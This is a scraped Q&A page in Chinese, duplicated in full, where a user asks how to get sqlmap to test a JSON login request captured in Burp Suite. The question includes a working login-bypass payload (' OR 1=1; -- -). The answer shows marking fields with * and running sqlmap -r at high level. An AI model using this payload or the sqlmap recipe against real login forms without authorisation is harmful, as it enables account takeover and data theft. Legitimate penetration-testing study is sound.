SQLMAP - Post JSON 数据作为正文
SQLMAP - Post JSON data as body
您好,我正在尝试在登录表单中进行 SQL 注入。
我使用 BurpSuite 拦截了请求:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
使用:
sqlmap -u requestFile
(其中requestFile为Burp拦截的请求内容)
sqlmap 找不到作为密码的可注入字段。
我确定这是可注射的,因为如果我输入密码:
' OR 1=1; -- -
我可以使用我输入的每个用户名登录
也尝试过:
{"username”:*,”password”:*}
但运气不好。
我做错了什么?
sqlmap -u URL
sqlmap -r requestFile
关于如何使用请求的教程
示例:
POST / HTTP/1.1
Host: www.example.com
{"username":"*", "password":"*"}
另存为sqlrequest.txt
然后可以使用此命令启动测试:
py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl
然后您应该会收到一条提示,提示已找到自定义注入标记并且在 POST 正文中找到了 JSON 数据。两者都处理,然后就可以了。
来源:
您好,我正在尝试在登录表单中进行 SQL 注入。
我使用 BurpSuite 拦截了请求:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
使用:
sqlmap -u requestFile
(其中requestFile为Burp拦截的请求内容)
sqlmap 找不到作为密码的可注入字段。
我确定这是可注射的,因为如果我输入密码:
' OR 1=1; -- -
我可以使用我输入的每个用户名登录
也尝试过:
{"username”:*,”password”:*}
但运气不好。
我做错了什么?
sqlmap -u URL
sqlmap -r requestFile
关于如何使用请求的教程
示例:
POST / HTTP/1.1
Host: www.example.com
{"username":"*", "password":"*"}
另存为sqlrequest.txt
然后可以使用此命令启动测试:
py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl
然后您应该会收到一条提示,提示已找到自定义注入标记并且在 POST 正文中找到了 JSON 数据。两者都处理,然后就可以了。
来源: